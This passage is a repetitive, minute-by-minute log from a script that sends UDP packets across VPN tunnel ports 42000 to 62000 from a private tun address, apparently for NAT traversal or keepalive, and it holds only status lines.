62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 08:54:05 -Starting port fill at 2020-09-06 08:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:55:07 -Starting port fill at 2020-09-06 08:56:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:56:07 -Starting port fill at 2020-09-06 08:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:57:06 -Starting port fill at 2020-09-06 08:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:58:06 -Starting port fill at 2020-09-06 08:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 08:59:06 -Starting port fill at 2020-09-06 09:00:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:00:04 -Starting port fill at 2020-09-06 09:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:01:05 -Starting port fill at 2020-09-06 09:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:02:05 -Starting port fill at 2020-09-06 09:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:03:06 -Starting port fill at 2020-09-06 09:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:04:06 -Starting port fill at 2020-09-06 09:05:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:05:06 -Starting port fill at 2020-09-06 09:06:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:06:04 -Starting port fill at 2020-09-06 09:07:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:07:04 -Starting port fill at 2020-09-06 09:08:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:08:07 -Starting port fill at 2020-09-06 09:09:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:09:06 -Starting port fill at 2020-09-06 09:10:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:10:05 -Starting port fill at 2020-09-06 09:11:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:11:05 -Starting port fill at 2020-09-06 09:12:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:12:06 -Starting port fill at 2020-09-06 09:13:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:13:06 -Starting port fill at 2020-09-06 09:14:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:14:06 -Starting port fill at 2020-09-06 09:15:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:15:06 -Starting port fill at 2020-09-06 09:16:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:16:06 -Starting port fill at 2020-09-06 09:17:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:17:06 -Starting port fill at 2020-09-06 09:18:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:18:04 -Starting port fill at 2020-09-06 09:19:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:19:04 -Starting port fill at 2020-09-06 09:20:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:20:06 -Starting port fill at 2020-09-06 09:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:21:04 -Starting port fill at 2020-09-06 09:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:22:06 -Starting port fill at 2020-09-06 09:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:23:06 -Starting port fill at 2020-09-06 09:24:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:24:06 -Starting port fill at 2020-09-06 09:25:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Finished port fill at 2020-09-06 09:25:07 -Starting port fill at 2020-09-06 09:26:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 09:26:05 -Starting port fill at 2020-09-06 09:27:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w 